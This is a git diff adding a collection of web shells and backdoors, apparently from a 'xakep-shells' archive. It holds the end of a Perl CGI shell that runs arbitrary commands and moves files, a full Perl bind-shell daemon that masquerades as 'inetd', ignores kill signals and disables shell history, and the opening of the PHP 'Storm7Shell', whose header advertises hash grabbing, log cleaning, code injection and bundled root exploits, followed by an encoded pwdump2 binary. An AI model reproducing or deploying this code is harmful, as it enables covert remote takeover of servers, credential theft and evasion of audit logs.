+
+#------------------------------------------------------------------------------
+# Logs out the user and allows the user to login again
+#------------------------------------------------------------------------------
+sub PerformLogout
+{
+	print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
+	&PrintPageHeader("p");
+	&PrintLogoutScreen;
+	&PrintLoginScreen;
+	&PrintLoginForm;
+	&PrintPageFooter;
+}
+
+#------------------------------------------------------------------------------
+# This function is called to login the user. If the password matches, it
+# displays a page that allows the user to run commands. If the password doens't
+# match or if no password is entered, it displays a form that allows the user
+# to login
+#------------------------------------------------------------------------------
+sub PerformLogin 
+{
+	if($LoginPassword eq $Password) # password matched
+	{
+		print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
+		&PrintPageHeader("c");
+		&PrintCommandLineInputForm;
+		&PrintPageFooter;
+	}
+	else # password didn't match
+	{
+		&PrintPageHeader("p");
+		&PrintLoginScreen;
+		if($LoginPassword ne "") # some password was entered
+		{
+			&PrintLoginFailedMessage;
+		}
+		&PrintLoginForm;
+		&PrintPageFooter;
+	}
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form that allows the user to enter commands
+#------------------------------------------------------------------------------
+sub PrintCommandLineInputForm
+{
+	$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+	print <<END;
+<code>
+<form name="f" method="POST" action="$ScriptLocation">
+<input type="hidden" name="a" value="command">
+<input type="hidden" name="d" value="$CurrentDir">
+$Prompt
+<input type="text" name="c">
+<input type="submit" value="Enter">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form that allows the user to download files
+#------------------------------------------------------------------------------
+sub PrintFileDownloadForm
+{
+	$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+	print <<END;
+<code>
+<form name="f" method="POST" action="$ScriptLocation">
+<input type="hidden" name="d" value="$CurrentDir">
+<input type="hidden" name="a" value="download">
+$Prompt download<br><br>
+Filename: <input type="text" name="f" size="35"><br><br>
+Download: <input type="submit" value="Begin">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form that allows the user to upload files
+#------------------------------------------------------------------------------
+sub PrintFileUploadForm
+{
+	$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+	print <<END;
+<code>
+<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
+$Prompt upload<br><br>
+Filename: <input type="file" name="f" size="35"><br><br>
+Options: &nbsp;<input type="checkbox" name="o" value="overwrite">
+Overwrite if it Exists<br><br>
+Upload:&nbsp;&nbsp;&nbsp;<input type="submit" value="Begin">
+<input type="hidden" name="d" value="$CurrentDir">
+<input type="hidden" name="a" value="upload">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# This function is called when the timeout for a command expires. We need to
+# terminate the script immediately. This function is valid only on Unix. It is
+# never called when the script is running on NT.
+#------------------------------------------------------------------------------
+sub CommandTimeout
+{
+	if(!$WinNT)
+	{
+		alarm(0);
+		print <<END;
+</xmp>
+<code>
+Command exceeded maximum time of $CommandTimeoutDuration second(s).
+<br>Killed it!
+<code>
+END
+		&PrintCommandLineInputForm;
+		&PrintPageFooter;
+		exit;
+	}
+}
+
+#------------------------------------------------------------------------------
+# This function is called to execute commands. It displays the output of the
+# command and allows the user to enter another command. The change directory
+# command is handled differently. In this case, the new directory is stored in
+# an internal variable and is used each time a command has to be executed. The
+# output of the change directory command is not displayed to the users
+# therefore error messages cannot be displayed.
+#------------------------------------------------------------------------------
+sub ExecuteCommand
+{
+	if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
+	{
+		# we change the directory internally. The output of the
+		# command is not displayed.
+		
+		$OldDir = $CurrentDir;
+		$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
+		chop($CurrentDir = `$Command`);
+		&PrintPageHeader("c");
+		$Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
+		print "<code>$Prompt $RunCommand</code>";
+	}
+	else # some other command, display the output
+	{
+		&PrintPageHeader("c");
+		$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
+		print "<code>$Prompt $RunCommand</code><xmp>";
+		$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
+		if(!$WinNT)
+		{
+			$SIG{'ALRM'} = \&CommandTimeout;
+			alarm($CommandTimeoutDuration);
+		}
+		if($ShowDynamicOutput) # show output as it is generated
+		{
+			$|=1;
+			$Command .= " |";
+			open(CommandOutput, $Command);
+			while(<CommandOutput>)
+			{
+				$_ =~ s/(\n|\r\n)$//;
+				print "$_\n";
+			}
+			$|=0;
+		}
+		else # show output after command completes
+		{
+			print `$Command`;
+		}
+		if(!$WinNT)
+		{
+			alarm(0);
+		}
+		print "</xmp>";
+	}
+	&PrintCommandLineInputForm;
+	&PrintPageFooter;
+}
+
+#------------------------------------------------------------------------------
+# This function displays the page that contains a link which allows the user
+# to download the specified file. The page also contains a auto-refresh
+# feature that starts the download automatically.
+# Argument 1: Fully qualified filename of the file to be downloaded
+#------------------------------------------------------------------------------
+sub PrintDownloadLinkPage
+{
+	local($FileUrl) = @_;
+	if(-e $FileUrl) # if the file exists
+	{
+		# encode the file link so we can send it to the browser
+		$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
+		$DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
+		$HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
+		&PrintPageHeader("c");
+		print <<END;
+<code>
+Sending File $TransferFile...<br>
+If the download does not start automatically,
+<a href="$DownloadLink">Click Here</a>.
+</code>
+END
+		&PrintCommandLineInputForm;
+		&PrintPageFooter;
+	}
+	else # file doesn't exist
+	{
+		&PrintPageHeader("f");
+		print "<code>Failed to download $FileUrl: $!</code>";
+		&PrintFileDownloadForm;
+		&PrintPageFooter;
+	}
+}
+
+#------------------------------------------------------------------------------
+# This function reads the specified file from the disk and sends it to the
+# browser, so that it can be downloaded by the user.
+# Argument 1: Fully qualified pathname of the file to be sent.
+#------------------------------------------------------------------------------
+sub SendFileToBrowser
+{
+	local($SendFile) = @_;
+	if(open(SENDFILE, $SendFile)) # file opened for reading
+	{
+		if($WinNT)
+		{
+			binmode(SENDFILE);
+			binmode(STDOUT);
+		}
+		$FileSize = (stat($SendFile))[7];
+		($Filename = $SendFile) =~  m!([^/^\\]*)$!;
+		print "Content-Type: application/x-unknown\n";
+		print "Content-Length: $FileSize\n";
+		print "Content-Disposition: attachment; filename=$1\n\n";
+		print while(<SENDFILE>);
+		close(SENDFILE);
+	}
+	else # failed to open file
+	{
+		&PrintPageHeader("f");
+		print "<code>Failed to download $SendFile: $!</code>";
+		&PrintFileDownloadForm;
+		&PrintPageFooter;
+	}
+}
+
+
+#------------------------------------------------------------------------------
+# This function is called when the user downloads a file. It displays a message
+# to the user and provides a link through which the file can be downloaded.
+# This function is also called when the user clicks on that link. In this case,
+# the file is read and sent to the browser.
+#------------------------------------------------------------------------------
+sub BeginDownload
+{
+	# get fully qualified path of the file to be downloaded
+	if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
+		(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
+	{
+		$TargetFile = $TransferFile;
+	}
+	else # path is relative
+	{
+		chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
+		$TargetFile .= $PathSep.$TransferFile;
+	}
+
+	if($Options eq "go") # we have to send the file
+	{
+		&SendFileToBrowser($TargetFile);
+	}
+	else # we have to send only the link page
+	{
+		&PrintDownloadLinkPage($TargetFile);
+	}
+}
+
+#------------------------------------------------------------------------------
+# This function is called when the user wants to upload a file. If the
+# file is not specified, it displays a form allowing the user to specify a
+# file, otherwise it starts the upload process.
+#------------------------------------------------------------------------------
+sub UploadFile
+{
+	# if no file is specified, print the upload form again
+	if($TransferFile eq "")
+	{
+		&PrintPageHeader("f");
+		&PrintFileUploadForm;
+		&PrintPageFooter;
+		return;
+	}
+	&PrintPageHeader("c");
+
+	# start the uploading process
+	print "<code>Uploading $TransferFile to $CurrentDir...<br>";
+
+	# get the fullly qualified pathname of the file to be created
+	chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
+	$TransferFile =~ m!([^/^\\]*)$!;
+	$TargetName .= $PathSep.$1;
+
+	$TargetFileSize = length($in{'filedata'});
+	# if the file exists and we are not supposed to overwrite it
+	if(-e $TargetName && $Options ne "overwrite")
+	{
+		print "Failed: Destination file already exists.<br>";
+	}
+	else # file is not present
+	{
+		if(open(UPLOADFILE, ">$TargetName"))
+		{
+			binmode(UPLOADFILE) if $WinNT;
+			print UPLOADFILE $in{'filedata'};
+			close(UPLOADFILE);
+			print "Transfered $TargetFileSize Bytes.<br>";
+			print "File Path: $TargetName<br>";
+		}
+		else
+		{
+			print "Failed: $!<br>";
+		}
+	}
+	print "</code>";
+	&PrintCommandLineInputForm;
+	&PrintPageFooter;
+}
+
+#------------------------------------------------------------------------------
+# This function is called when the user wants to download a file. If the
+# filename is not specified, it displays a form allowing the user to specify a
+# file, otherwise it displays a message to the user and provides a link
+# through  which the file can be downloaded.
+#------------------------------------------------------------------------------
+sub DownloadFile
+{
+	# if no file is specified, print the download form again
+	if($TransferFile eq "")
+	{
+		&PrintPageHeader("f");
+		&PrintFileDownloadForm;
+		&PrintPageFooter;
+		return;
+	}
+	
+	# get fully qualified path of the file to be downloaded
+	if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
+		(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
+	{
+		$TargetFile = $TransferFile;
+	}
+	else # path is relative
+	{
+		chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
+		$TargetFile .= $PathSep.$TransferFile;
+	}
+
+	if($Options eq "go") # we have to send the file
+	{
+		&SendFileToBrowser($TargetFile);
+	}
+	else # we have to send only the link page
+	{
+		&PrintDownloadLinkPage($TargetFile);
+	}
+}
+
+#------------------------------------------------------------------------------
+# Main Program - Execution Starts Here
+#------------------------------------------------------------------------------
+&ReadParse;
+&GetCookies;
+
+$ScriptLocation = $ENV{'SCRIPT_NAME'};
+$ServerName = $ENV{'SERVER_NAME'};
+$LoginPassword = $in{'p'};
+$RunCommand = $in{'c'};
+$TransferFile = $in{'f'};
+$Options = $in{'o'};
+
+$Action = $in{'a'};
+$Action = "login" if($Action eq ""); # no action specified, use default
+
+# get the directory in which the commands will be executed
+$CurrentDir = $in{'d'};
+chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
+
+$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
+
+if($Action eq "login" || !$LoggedIn) # user needs/has to login
+{
+	&PerformLogin;
+}
+elsif($Action eq "command") # user wants to run a command
+{
+	&ExecuteCommand;
+}
+elsif($Action eq "upload") # user wants to upload a file
+{
+	&UploadFile;
+}
+elsif($Action eq "download") # user wants to download a file
+{
+	&DownloadFile;
+}
+elsif($Action eq "logout") # user wants to logout
+{
+	&PerformLogout;
+}
diff --git a/xakep-shells/PERL/telnetd.pl.txt b/xakep-shells/PERL/telnetd.pl.txt
new file mode 100644
index 0000000..aa1d004
--- /dev/null
+++ b/xakep-shells/PERL/telnetd.pl.txt
@@ -0,0 +1,462 @@
+#!/usr/bin/perl
+# Telnet-like Standard Daemon 0.7
+#
+#    0ldW0lf - oldwolf@atrixteam.net
+#            - old-wolf@zipmai.com
+#            - www.atrix.cjb.net
+#            - www.atrixteam.net
+#
+#  For those guys that still like to open ports
+#  and use non-rooted boxes
+#
+#  This has been developed to join in the TocToc
+#  project code, now it's done and I'm distributing
+#  this separated
+#
+#  This one i made without IO::Pty so it uses
+#  only standard modules... enjoy it
+#
+#  tested on linux boxes.. probably will work fine on others
+#  any problem... #atrix@irc.brasnet.org
+#
+
+##########################################################
+# ******************* CONFIGURATION ******************** #
+##########################################################
+my $PORT        = $ARGV[0] || 3847;        # default port is 3847
+my $PASS        = '';         # encripted password
+my $SHELL       = "/bin/bash";             # shell to be executed
+my $HOME        = "/tmp";                  # your HOME
+my $PROC        = "inetd";                 # name of the process
+my $PASS_PROMPT = "Password: ";            # password prompt
+my $WRONG_PASS  = "Wrong password!";       # "wrong password" message
+my @STTY        = ('sane', 'dec');         # stty arguments
+##########################################################
+
+# feel free to change the ENV
+#### ENVironment ####
+$ENV{HOME}       = $HOME;
+#$ENV{PS1}        = '[\u@\h \W]: '; # the way i like :)
+                 # colorful PS1 is also funny :)
+$ENV{PS1}        = '\[\033[3;36m\][\[\033[3;34m\]\[\033[1m\]\u\[\033[3;36m\]@\[\033[0m\]\[\033[3;34m\]\[\033[1m\]\h \[\033[0m\]\[\033[1m\]\W\[\033[0m\]\[\033[3;36m\]]\[\033[0m\]\[\033[1m:\[\033[0m\] ';
+$ENV{MAIL}       = '/var/mail/root';
+$ENV{PATH}       = '/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin';
+$ENV{HISTFILE}   = '/dev/null';
+$ENV{USER}       = 'root';
+$ENV{LOGNAME}    = 'root';
+$ENV{LS_OPTIONS} = ' --color=auto -F -b -T 0';
+$ENV{LS_COLORS}  = 'no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.bz2=01;31:*.rpm=01;31:*.deb=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.mpg=01;37:*.avi=01;37:*.mov=01;37:';
+$ENV{SHELL}      = $SHELL;
+$ENV{TERM}       = 'xterm';
+#####################
+
+$0=$PROC."\0";
+
+use IO::Socket;
+use IO::Select;
+use POSIX;
+use strict;
+
+# i wouldn't change that
+# if i were you
+###### SIGnals ######
+$SIG{HUP}  = 'IGNORE';
+$SIG{PS}   = 'IGNORE';
+$SIG{TERM} = 'IGNORE';
+$SIG{CHLD} = sub { wait; };
+#####################
+
+
+# ioctl stuff
+my %IOCTLDEF;
+$IOCTLDEF{TIOCSWINSZ} = 0x5414;
+$IOCTLDEF{TIOCNOTTY}  = 0x5422;
+$IOCTLDEF{TIOCSCTTY}  = 0x540E;
+safeload('sys/ttycom.ph', 1); # BSD
+safeload('sys/ioctl.ph', 1);
+safeload('asm/ioctls.ph', 1);
+
+foreach my $IOCTL (keys(%IOCTLDEF)) {
+  next if (defined(&{$IOCTL}));
+
+  if (open(IOD, "< /usr/include/asm/ioctls.h")) { # linux
+    while(<IOD>) {
+      if (/^\#define\s+$IOCTL\s+(.*?)\n$/) {
+        eval "sub $IOCTL () {$1;}";
+        last;
+      }
+    }
+    close(IOD);
+  }
+
+  # i realy dunno if i can do that.. but.. here it goes
+  eval "sub $IOCTL () { $IOCTLDEF{$IOCTL};}" unless (defined(&{$IOCTL}));
+}
+
+
+# starting...
+$PORT = $ARGV[0] if ($ARGV[0]);
+chdir('/');
+
+no strict 'refs';
+my $bindfd = *{'bind_sock'};
+*{$bindfd}= IO::Socket::INET->new(Listen => 1, LocalPort => $PORT, Proto => "tcp") || die "could not listen on port $PORT: $!";
+my $bind = \*{$bindfd};
+
+my $pid = fork();
+die "ERROR: I could not fork() the process." unless defined($pid);
+exit if $pid;
+
+
+my %CLIENT;
+my $sel_serv = IO::Select->new($bind);
+my $sel_shell = IO::Select->new();
+
+
+# main loop...
+while ( 1 ) {
+  select(undef,undef,undef, 0.3) if (scalar(keys(%CLIENT)) == 0);
+
+  read_clients();
+  read_shells();
+}
+
+sub read_clients {
+  map { read_client($_) } ($sel_serv->can_read(0.01));
+}
+
+sub read_client {
+  my $fh = shift;
+
+  if ($fh eq $bind) {
+    my $newcon = $bind->accept;
+    $sel_serv->add($newcon);
+    $CLIENT{$newcon}->{senha} = 0;
+    $CLIENT{$newcon}->{sock} = $newcon;
+    $fh->autoflush(1);
+    do_client($newcon, '3', '5', '1');
+    sleep(1);
+    write_client($newcon, $PASS_PROMPT) if ($PASS_PROMPT);
+  } else {
+      my $msg;
+      my $nread = sysread($fh, $msg, 1024);
+
+      if ($nread == 0) {
+        close_client($fh);
+      } else {
+         telnet_parse($fh, $msg);
+      }
+  }
+}
+
+sub read_shells {
+  map { read_shell($_) } ($sel_shell->can_read(0.01));
+}
+
+sub telnet_parse {
+  my ($cli, $msg) = @_;
+  my $char = (split('', $msg))[0];
+
+  if (ord($char) == 255) {
+     chr_parse($cli, $msg);
+  } else {
+     if ($CLIENT{$cli}->{senha} == 0) {
+       $CLIENT{$cli}->{buf} .= $msg;
+
+       return() unless ($msg =~ /\r|\n/);
+
+       my $pass = $CLIENT{$cli}->{buf};
+       $CLIENT{$cli}->{buf} = '';
+
+       $pass =~ s/\n//g;
+       $pass =~ s/\0//g;
+       $pass =~ s/\r//g;
+
+       if (crypt($pass, $PASS) ne $PASS) {
+         finish_client($cli, "\r\n\r".$WRONG_PASS."\r\n\r");
+       } else {
+          $CLIENT{$cli}->{senha} = 1;
+          write_client($cli, chr(255).chr(253).chr(31));
+          write_client($cli, "\r\n\r\r\n\r");
+          new_shell($cli);
+       }
+       return();
+     }
+
+     $msg =~ s/\r\n\0\0//g;
+     $msg =~ s/\0//g;
+     $msg =~ s/\r\n/\n/g;
+     write_shell($cli, $msg);
+  }
+}
+
+sub read_shell {
+  my $shell = shift;
+  my $cli;
+  map { $cli = $CLIENT{$_}->{sock} if ($CLIENT{$_}->{shell} eq $shell) } keys(%CLIENT);
+
+  my $msg;
+  my $nread = sysread($shell, $msg, 1024);
+ 
+  if ($nread == 0) {
+    finish_client($cli, "Terminal closed.\r\n\r");
+  } else {
+     write_client($cli, $msg);
+  }
+}
+
+sub to_chr {
+  my $chrs = '';
+  map { $chrs .= chr($_) }  (split(/ +/, shift));
+  return($chrs);
+}
+
+sub do_client {
+  my ($client, @codes) = @_;
+  map { write_client($client, chr(255).chr(251).chr($_)) } @codes;
+}
+
+
+sub chr_parse { 
+  my ($client, $chrs) = @_;
+
+  my $ords = '';
+  map { $ords .= ord($_).' ' } (split(//, $chrs));
+  my $msg = '';
+
+
+  if ($ords =~ /255 250 31 (\d+) (\d+) (\d+) (\d+)/) {
+     my $winsize = pack('C4', $4, $3, $2, $1);
+     ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);# || die "erro: $!";
+  }
+
+  foreach my $code (split("255 ", $ords)) {
+    if ($code =~ /(\d+) (.*)$/) {
+      my $codes = $2;
+      if ($1 == 251) {
+        # do whatever you want dude ehehe
+        $msg .= chr(255).chr(253);
+
+        map { $msg .= chr($_) } (split(/ +/, $codes));
+      }
+    }
+  }
+
+  write_client($client, $msg) if ($msg);
+  return(1);
+}
+
+sub new_shell {
+  my $cli = shift;
+
+  POSIX::setpgid(0, 0);
+
+  my ($tty, $pty);
+
+  unless (($tty, $pty) = open_tty($cli)) {
+    finish_client($cli, "ERROR: No more pty?s avaliable\n");
+    return(undef);
+  }
+
+  my $pid = fork();
+  if (not defined($pid)) {
+    finish_client($cli, "ERROR: fork()\n");
+    return(undef);
+  }
+
+  unless($pid) {
+    close($pty);
+
+    local(*DEVTTY);
+
+    if (open (DEVTTY, "/dev/tty")) {
+      ioctl(DEVTTY, &TIOCNOTTY, 0 );# || die "erro: $!";
+      close(DEVTTY);
+    }
+
+    POSIX::setsid();
+    ioctl($tty, &TIOCSCTTY, 0);# || die "erro: $!";
+
+    open (STDIN, "<&".fileno($tty)) || die "I could not reopen STDIN: $!";
+    open (STDOUT, ">&".fileno($tty)) || die "I could not reopen STDOUT: $!";
+    open (STDERR, ">&".fileno($tty)) || die "I could not reopen STDERR: $!";
+    close($tty);
+
+    sleep(1);
+
+    foreach my $stty ("/bin/stty", "/usr/bin/stty") {
+      next unless (-x $stty);
+      map { system("$stty", $_) } @STTY;
+    }
+
+    chdir("$HOME");
+    { exec("$SHELL") };
+
+    syswrite(STDOUT, "\n\nERROR: exec($SHELL)\n\nI could not execute the shell ($SHELL)\nHowever you are lucky :P\nYou can use the \"I'm FUCKED!\" mode and fix up this thing...\nTip: Find some shell and execute it ;)\n\n");
+    syswrite(STDOUT, "\n\nOK! I'm Fucked mode.\n");
+    syswrite(STDOUT, "Type ^C to exit\n\nI'm FuCKeD!# ");
+
+    while (my $msg = <STDIN>) {
+      $msg =~ s/\n$//;
+      $msg =~ s/\r$//;
+
+      if ($msg =~ /^\s*cd\s+(\S+)/) {
+        my $notf = "directory $1 not found!\n";
+        chdir($1) || syswrite(STDOUT, $notf, length($notf));
+      } else {
+         system("$msg 2>&1");
+      }
+      syswrite(STDOUT, "I'm FuCKeD!# ");
+    }
+
+    exit;
+  }
+  close($tty);
+
+  select($pty); $| = 1;
+  select(STDOUT);
+
+  set_raw($pty);
+
+  $CLIENT{$cli}->{shell} = $pty;
+  $sel_shell->add($pty);
+
+  return(1);
+}
+
+
+
+# Funciton set_raw() stolen from IO::Pty
+sub set_raw($) {
+  my $self = shift;
+  return 1 if not POSIX::isatty($self);
+  my $ttyno = fileno($self);
+  my $termios = new POSIX::Termios;
+  unless ($termios) {
+#    warn "set_raw: new POSIX::Termios failed: $!";
+    return undef;
+  }
+  unless ($termios->getattr($ttyno)) {
+#    warn "set_raw: getattr($ttyno) failed: $!";
+    return undef;
+  }
+  $termios->setiflag(0);
+  $termios->setoflag(0);
+  $termios->setlflag(0);
+  $termios->setcc(&POSIX::VMIN, 1);
+  $termios->setcc(&POSIX::VTIME, 0);
+  unless ($termios->setattr($ttyno, &POSIX::TCSANOW)) {
+#    warn "set_raw: setattr($ttyno) failed: $!";
+    return undef;
+  }
+  return 1;
+}
+
+sub open_tty {
+  no strict;
+  my $cli = shift;
+  my ($PTY, $TTY) = (*{"pty.$cli"}, *{"tty.$cli"}); # believe me old versions :/
+
+  
+  for (my $i = 0; $i < 256; $i++) {
+     my $pty = get_tty($i, "/dev/pty");
+     next unless (open($PTY, "+> $pty"));
+
+     my $tty = get_tty($i, "/dev/tty");
+
+     unless(open($TTY, "+> $tty")) {
+       close($PTY);
+       next;
+     }
+
+     return($TTY, $PTY);
+
+  }
+
+  return();
+}
+
+sub get_tty {
+  my ($num, $base) = @_;
+
+  my @series = ('p' .. 'z', 'a' .. 'e');
+  my @subs = ('0' .. '9', 'a' .. 'f');
+
+  my $buf = $base;
+  $buf .= @series[($num >> 4) & 0xF];
+  $buf .= @subs[$num & 0xF];
+
+  return($buf);
+}
+
+sub safeload {
+  my ($module, $require, $arg) = @_;
+  my $file = $module;
+  $file =~ s/::/\//g;
+
+  if ($require) {
+    # all found gonna be loaded
+    map { eval ("require \"$_/$file\";") if(-f "$_/$file"); } @INC;
+  } else {
+      $file .= ".pm" unless ($file =~ /(\.pm|\.ph)$/);
+      return(eval("use $module $arg;")) if (grep { -f "$_/$file" } @INC);
+  }
+
+  return();
+}
+
+sub write_shell {
+  my ($cli, $msg) = @_;
+  my $shell = $CLIENT{$cli}->{shell};
+
+  return(undef) unless ($shell);
+
+  foreach my $m (split_chars($msg, 20)) {
+    read_shells();
+    print $shell $m;
+    read_shells();
+  }
+  return(1);
+}
+
+sub split_chars {
+  my ($msg, $nchars) = @_;
+
+  my @splited;
+  my @chrs = split ('', $msg);
+  my $done = 0;
+  while ( 1 ) {
+    my $splited = join('', @chrs[$done .. ($done+$nchars-1)]);
+    $done += $nchars;
+    last if (length($splited) < 1);
+    push(@splited, $splited);
+  }
+  return(@splited);
+}
+
+sub finish_client {
+  my ($cli, $msg) = @_;
+  write_client($cli, $msg);
+  close_client($cli);
+}
+   
+sub close_client {
+  my $cli = shift;
+  my $sock = $CLIENT{$cli}->{sock};
+
+  $sel_serv->remove($sock);
+  if ($CLIENT{$cli}->{shell}) {
+    my $shell = $CLIENT{$cli}->{shell};
+    $sel_shell->remove($shell);
+    close($shell);
+  }
+  $sock->close() if($sock);
+  delete($CLIENT{$cli});
+}
+
+sub write_client {
+   my ($cli, $msg) = @_;
+   my $sock = $CLIENT{$cli}->{sock};
+   syswrite($sock, $msg, length($msg)) if ($sock);
+}
+ 
diff --git a/xakep-shells/PHP/1.txt b/xakep-shells/PHP/1.txt
new file mode 100644
index 0000000..e91966e
--- /dev/null
+++ b/xakep-shells/PHP/1.txt
@@ -0,0 +1,8340 @@
+<?php
+
+/******************************************************************************************
+*  Storm7Shell, a modded Locus7Shell, which is a: $count=0; while($count==0){ echo ' mod of a'; }
+*
+*  VERSION 2 BITCH!!!!
+*
+*  By sToRm - the 15-year-old hacker :)
+*
+*  Greetz to all my friends in #lobby
+*
+*  A big, fat "fuck you" to:
+*   - HellBound Hackers (you're also part of the next on the list, except you can't even deface!)
+*   - people who deface because they can't root and think they're 1337
+*   - idiots who add mail() to their shells so they can log your ownages
+*   - idiots who add mail() to their shells so they can log your ownages and mess up the variables so it doesn't even work!
+*   - MPAA, RIAA, and all those other arse-hole anti-p2p organizations
+* 
+*  lack of money and parental freedom leaves me with no site to advertise xD
+*
+*
+*  Newer Mods (added by me) for v2 --
++--------------------------------------------------------+
+*  fixed a bug where deleting something from a path that has a space in it would return you to an invalid dir
+*  fixed the *nix aliases where the cmds were in the name and the names were executed :S
+*  added md5/sha1 file checksums
+*  removed fgdump (no need for three programs that do the same f-ing thing :P) !!! 1 mb saved !!!
+*  
+*
+*  Old Mods (added by me) for v1 --
++--------------------------------------------------------+
+*  added the trojan executer
+*  cleaned up the interface in general
+*  added windows login hash grabber + sam/fg/pwdump2
+*  added mass code injector (thanks SubSyn)
+*  added pre-compiled h00lyshit and raptor_chown
+*  added log cleaners for both *nix and windows
+*  removed all the shitty/non-working functions in the drop-down boxes
+*  fixed the google kernel thing (the search variables were fuxxed up)
+*  made the dir listing easier to read with the alternating bgcolors
+*  little optimizations in code here and there (i'm an optimization whore tbh)
+*  submit md5/sha1 hash to cracking sites
+*  made that awesome logo ;)
+*  added the disabled php functions thing (took from r57shell)
+*  added better windows/*nix-specific aliases
+*  cleaned up the safe-mode bypass functions (wow, some of the shittiest code i've ever seen o_O )
+*  wordlist md5/sha1 cracker
+*
+*  What I Plan to Do Next --
++--------------------------------------------------------+
+*  smaller size (somehow) :S
+*  more sploits
+*  allow input for dir to unpack exploits to
+*  better trojans/backdoors
+*  more functions/aliases
+*  maybe move stuff around/change theme
+*  make the php picture in the dir listing white for easier readability
+*  take a first look at the sql section o.O
+*  remove:
+*   - more of those stupid spaces after every line
+*   - more " and change them to ' for faster execution
+*   - a bunch of other stupid code things (example:  echo("$msg");  (wtf... :S))
+*********************************************************/
+
+//milw0rm search
+$Lversion = php_uname(r);
+$OSV = php_uname(s);
+if(eregi('Linux',$OSV))
+{
+$Lversion=substr($Lversion,0,6);
+$millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
+}else{
+$Lversion=substr($Lversion,0,3);
+$millink="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
+}
+//End of milw0rm search
+
+
+//w4ck1ng Shell
+if (!function_exists('myshellexec'))
+{
+if(is_callable("popen")){
+function myshellexec($command) {
+if (!($p=popen("($command)2>&1","r"))) {
+return 126;
+}
+while (!feof($p)) {
+$line=fgets($p,1000);
+$out .= $line;
+}
+pclose($p);
+return $out;
+}
+}else{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = '';
+ if (!empty($cmd))
+ {
+  if (is_callable('exec') and !in_array('exec',$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== FALSE) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = '';
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+ }
+ return $result;
+}
+}
+}
+
+$pwdump2="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAA0AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
+ZGUuDQ0KJAAAAAAAAABe6Dg9GolWbhqJVm4aiVZu8pZdbhuJVm6ZlVhuF4lWbkOqRW4fiVZuGolX
+biGJVm7lqVxuG4lWbvKWXG4qiVZuUmljaBqJVm4AAAAAAAAAAFBFAABMAQMA7bzbOAAAAAAAAAAA
+4AAPAQsBBgAAUAAAAEAAAAAAAABHHAAAABAAAABgAAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAA
+AAAAAKAAAAAQAAAAAAAAAwAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAyGQAADwA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgAADwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
